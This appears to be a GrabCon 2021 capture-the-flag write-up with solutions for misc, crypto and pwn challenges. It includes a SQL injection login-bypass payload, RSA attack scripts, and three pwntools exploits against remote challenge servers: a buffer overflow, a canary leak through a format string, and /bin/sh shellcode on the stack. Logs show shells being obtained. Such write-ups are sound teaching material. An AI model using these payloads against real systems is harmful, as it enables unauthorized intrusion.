# GrabCon 21 - CTF Community
# Misc
```
Welcome
50
GrabCON{welcome_to_grabcon_2021}
```
## Eazy-Peazy
```
E4sy Pe4sy
100
Hack admin user!
Link
Author: r3curs1v3_pr0xy
```
' or 1=1;# '
**GrabCON{E4sy_pe4sy_SQL_1nj3ct10n}**
# Crypto
## Warm-up
```
Warm-up
50
Mukesh used to drink and then smoke 5 times a day. He is now suffering form cancer his drink was 64 rupees and 32 rupees cigarette that costs to cheap for him. And he has this much of cancer now.
Author: Offen5ive
```
```
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)&input=UzAxWlJFTlhVMU5KVmtoR1VWWktVa3BhUmtaTk1sTkxTVFZLVkVOV1UweExWbFpZUVZsTFZFbGFUa1ZWVmxSTlMwcElSa2MyVTFkS1ZrcEhWMDFMV0V0YVExVlZWRU5YVGxKT1JsTlZTMWRPVWtkR1MwMUVWVXMxUzBkWFZsTkxTMXBEV0ZGVVExUk9VbGxGVDFWVVRFMVNURlpEVFV4RlNrNU1SMWMwUTBsTFdWbEVRMVJEV0V0V01rWk5WakpXVGtKS1JrMVNTMDlNUWt0SFYwNUVXa3RLVjBVMFZsTk9UbEpUUlZkV1ZFdExTa3hXUjAxQ1VrbE9URWRYTlVOUVMwNVhSa1ZTUTFkTFdraEZTVlZhVWs5Q1RVWkZNakpYUzFaS1ZFTlhVMHRMV2xaV1ZWSlRWVWRHVEVaTFZrTkdSMFpJVlRSU1UxWlFSa2RYV1ZSVFRVdE9WbFJMVkV0VFIwWlNWRUZWU2xGTlVrZEdTVlpVVFVzMVNrWk5WRXhhUzFwV1dFbFdNazVPVGt4Rk5GWlVTMHBLVEZaSlVreFJTbFpLUjFkTlMxUkxUVmxFVTFSRFZrNU9Na1ZSVmpKWFNscExSazFXVEZWS1RrcFVRMVZUUlV0YVYwVTBWakpUUjBKT1JrbFZVMWROVWt4R1RWSk1WVXBTU2xkWE5rTllTMGxaVmxWU1ExUkhRVmxWVDFaRFJrMVNUVVUwVmt0UFMwWktWRU5UVTBWTFdsZEdUVlpMVWtkR1UwVTJWa3hNVFZKTlZrdE5TMWROUmt0WFYwOUxSRXRGV1VaVlZVTldUazR5UlZGVldsSlBRa2RHVFZKTFQwczFTMVJCTTBOTlMwcFdXRkZUUTFoTFdsTkZTVlpNVEUxU1JGWkpNakl5U2xKTVIxZFVVMGhMU1ZsV1ZWTXlWMDVPVTBaSFZUTXlTa3BHUmtzeU0wVkxWa2xXVFZWVFZVdFNTMWhKVkRKWFIwSk9SazFXVERKS1NrMUdSVTFETWt0T1RFVkxVbE5YUzA1WFJVMVZRMUpPVGxORlQxWkVNa3BHTlVaUFZreE1SMFpLVkVGWFUwOUxXVmxWTkZKVFZFZEdXVVZKVmxKUlRsSktSVEl5V2xaS05VdEhWMDVMUjB0V1RFWlZWa05YVGswMFZVZFZNMHhNU2taR1N6SXpXVXRLU2xkWFUxTk1TMGxaVjBkTlMxSkhSa3BGV1ZaTVRFcGFUVlpMVmxOUFNsSkxWRUUxUTFOTE5VdFdSVlpEVjB0V1NFWk5WVkpSU1ZWWlJrMHlNa2RMV2twWFZWWlRTa3RhUzBSQlQwdFJTMUZaUkZOVlExSklWVFpSUFQwOVBRPT0K
```
GrabCON{dayuum_s0n!}
## Pokeball RSA
```
Poke Ball RSA
100
Eevee is in trouble. Help him as he tries to evolve into Sylveon in the Real Stormy Arena.
Author: RDxR10
```
```
n = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319
e = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799
c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818
```
```
#https://pycryptodome.readthedocs.io/en/latest/src/public_key/rsa.html
N = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319
E = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799
c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818
print((E,N))
from sympy.core import Rational
from sympy.ntheory.continued_fraction import continued_fraction_convergents
from sympy.ntheory.continued_fraction import continued_fraction_iterator
from Crypto.PublicKey import RSA
import binascii
it = continued_fraction_convergents(continued_fraction_iterator(Rational(E,N)))
res=[]
for i in range(1000):
elt = next(it)
if str(elt).find("/")>-1:
d=int(str(elt).split("/")[1])
print(".",sep="",end="",flush=True)
try:
key = RSA.construct((N,E,d))
print("================")
print(d)
break
except:
pass
pt=hex(pow(c,d,N))
print(pt)
print(binascii.unhexlify(pt[2:]))
```
```
b'e=2,c=9019127052844164572606928250741960583163943438936945828390420331200602392329'
```
```
import gmpy
from Crypto.Util.number import *
e=2
ct=9019127052844164572606928250741960583163943438936945828390420331200602392329
ct= gmpy.root(ct,e)[0]
import binascii
print(binascii.unhexlify(hex(ct)[2:]))
```
## Not RSA - First Blood
```
Not RSA
440
Whatever it is, it's not RSA.
Author: RDxR10
```
```
from math import sqrt
import random
from Crypto.Util.number import bytes_to_long,long_to_bytes
N = 2433984714450860961589027518159810370561856716063956157321856705975948489337570445957833120668443867975490363019335530343179129689501017626817947777263721
c = 1378297008929492435762470180953416238081302819750327089183697281160938504327642742017058360280755400054663296904328307673692314945545918393502459480987913
a = int(sqrt(N) + 1)
b = random.randint(0,9999999999)
#flag = b"REDACTED"
#m = bytes_to_long(flag)
#c = ((a**m)*(b**(a-1)))%((a-1)*(a-1))
p=194545307101606186694882845905355574989
q=253593527157826835431576067999755840801
r=pow(c,pow(p*q,-1,(p-1)*(q-1)),p*q)
m=((((c*pow(r,-p*q,N))-1)%N)//(p*q))%N
print(hex(m))
print(long_to_bytes(m))
#GrabCON{i75_p4ill13r_f0lks}
```
**GrabCON{i75_p4ill13r_f0lks}**
## Old Monk's Password
```
Old Monk's Password
150
Monk: What's this man? One password, different encoded forms?
Author: RDxR10
```
```
enc = b'\x0cYUV\x02\x13\x16\x1a\x01\x04\x05C\x00\twcx|z(((%.)=K%(>'
enc1 = b'\x0bPPS\r\x0b\x02\x0f\x12\r\x03_G\t\x08yb}v+--*+*8=W,>'
enc2 = b'\x07A[\x06\\\r\x15\t\x04\x07\x18VG]U]@\x02\x08&9&%\' 41".;'
import codecs
import random
class pass_w:
x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm"
def encode(self, text, i = -1):
if i < 0 or i > len(self.x) + 1:
i = random.randint(0, len(self.x) + 1)
out = chr(i)
for c in text:
out += chr(ord(c) ^ ord(self.x[i]))
i = (i + 1)%79
return codecs.encode(out)
#y = pass_w()
#print(y.encode("REDACTED"))
#Enclose password within GrabCON{}
def decode(enc):
x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm"
i = enc[0]
print(i)
out=""
for c in enc[1:]:
out += chr(c ^ ord(x[i]))
i = (i + 1)%79
print(out)
print(decode(enc))
```
**GrabCON{817letmein40986728ilikeapples}**
# Pwn
## Easy bin
```
from pwn import *
# Read Service
proc = ELF("./easybin")
print(proc.symbols)
# magie
magie = p64(proc.symbols["vuln"])
for i in range(56,57):
# lockpick
print(i)
pl=b"a"*i+magie
print(pl)
# Execute
try:
exec=process("./easybin")
exec.sendline(pl)
#print(exec.read(1024))
exec.interactive()
#print(exec.poll())
exec.close()
except:
pass
exploit=True
if exploit:
conn = remote('35.205.161.145','49153')
#pl=b"a"*i+magie
#print(conn.recv())
conn.sendline(pl)
conn.interactive()
conn.close()
```
```
[*] '/home/kali/Desktop/grabcon/pwn/easybin'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
{'__abi_tag': 4195228, 'deregister_tm_clones': 4198560, 'register_tm_clones': 4198608, '__do_global_dtors_aux': 4198672, 'completed.0': 4210752, '__do_global_dtors_aux_fini_array_entry': 4210184, 'frame_dummy': 4198720, '__frame_dummy_init_array_entry': 4210176, '__FRAME_END__': 4202884, '__init_array_end': 4210184, '_DYNAMIC': 4210192, '__init_array_start': 4210176, '__GNU_EH_FRAME_HDR': 4202552, '_GLOBAL_OFFSET_TABLE_': 4210688, '__libc_csu_fini': 4198928, 'data_start': 4210736, 'vuln': 4198726, '_edata': 4210752, '_fini': 4198936, '__data_start': 4210736, '__dso_handle': 4210744, '_IO_stdin_used': 4202496, '__libc_csu_init': 4198816, '_end': 4210760, '_dl_relocate_static_pie': 4198544, '_start': 4198496, '__bss_start': 4210752, 'main': 4198762, '__TMC_END__': 4210752, '_init': 4198400, 'printf': 4198448, 'plt.printf': 4198448, 'execve': 4198464, 'plt.execve': 4198464, 'gets': 4198480, 'plt.gets': 4198480, '_ITM_deregisterTMCloneTable': 4210656, 'got._ITM_deregisterTMCloneTable': 4210656, '__libc_start_main': 4210664, 'got.__libc_start_main': 4210664, '__gmon_start__': 4210672, 'got.__gmon_start__': 4210672, '_ITM_registerTMCloneTable': 4210680, 'got._ITM_registerTMCloneTable': 4210680, 'got.printf': 4210712, 'got.execve': 4210720, 'got.gets': 4210728}
56
b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaF\x11@\x00\x00\x00\x00\x00'
[+] Starting local process './easybin': pid 37201
[*] Switching to interactive mode
$ exit
[*] Got EOF while reading in interactive
$ quit
[*] Process './easybin' stopped with exit code 0 (pid 37201)
[*] Got EOF while sending in interactive
[+] Opening connection to 35.205.161.145 on port 49153: Done
[*] Switching to interactive mode
$ ls
easybin
flag.txt
run.sh
ynetd
$ cat flag.txt
GrabCON{w3ll_Y0u_Kn0w_Basics!!!}
```
## Can you ?
leak the canary ?
```
from pwn import *
import time
# Read Service
proc = ELF("./cancancan")
print(proc.symbols)
# magie
magie = p32(proc.symbols["win"])
for i in range(25,26):
# Iteration
print(i)
# Execute
try:
exec=process("./cancancan")
exec.sendline(b"%31$x")
canary = int(b"0x"+exec.recv(1024).split(b"\n")[1],16)
pl = b"aaaa"*i+p32(canary)+magie*4
exec.sendline(pl)
exec.interactive()
#print(exec.poll())
exec.close()
except:
pass
exploit=True
if exploit:
conn = remote('35.246.42.94','31337')
conn.sendline(b"%31$x")
time.sleep(1)
canary = int(b"0x"+conn.recv(1024).split(b"\n")[1],16)
print(canary)
pl = b"aaaa"*i+p32(canary)+magie*4
conn.sendline(pl)
conn.interactive()
conn.close()
pass
# GrabCON{Byp4ss_can4ry_1s_fun!}
```
**GrabCON{Byp4ss_can4ry_1s_fun!}**
## Pwn CTF
Shellcode on the stack,
```
from pwn import *
import time
for i in range(302,303):
print(i)
conn = remote("35.246.42.94","1337")#process("./pwn2")
time.sleep(2)
stack = int(conn.recv().split(b"\n")[1].split(b" ")[2][:-1],16)
print(hex(stack))
#pl =b"\x90"*i+p32(stack)+b"\x90"*100+b"\x31\xc0\x40\x89\xc3\xcd\x80"#b"\x90"*100+b"\x50\x48\x31\xD2\x48\x31\xF6\x48\xBB\x6D\x20\x2B\x2C\x6D\x6D\x31\x2A\x48\xB8\x42\x42\x42\x42\x42\x42\x42\x42\x48\x31\xC3\x53\x54\x5F\x48\x31\xC0\xB0\x3B\x0F\x05"
pl =b"\x90"*i+p32(stack)+b"\x90"*100+b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
conn.sendline(pl)
time.sleep(1)
try:
#print(conn.recv())
conn.interactive()
except:
conn.close()
conn.close()
input()
#conn.interactive()
```
```
kali@kali:~/Desktop/grabcon/pwn$ python3 blacklisted.py
302
[+] Opening connection to 35.246.42.94 on port 1337: Done
0xffe7d4be
[*] Switching to interactive mode
$
$ ls
bin
dev
flag.txt
lib
lib32
lib64
pwn2
$ cat flag.txt
GrabCON{Y0U_g0t_Sh3ll_B4asics}
$
```
**GrabCON{Y0U_g0t_Sh3ll_B4asics}**
That's all folks - Electro
Sign in with Wallet
Connect another wallet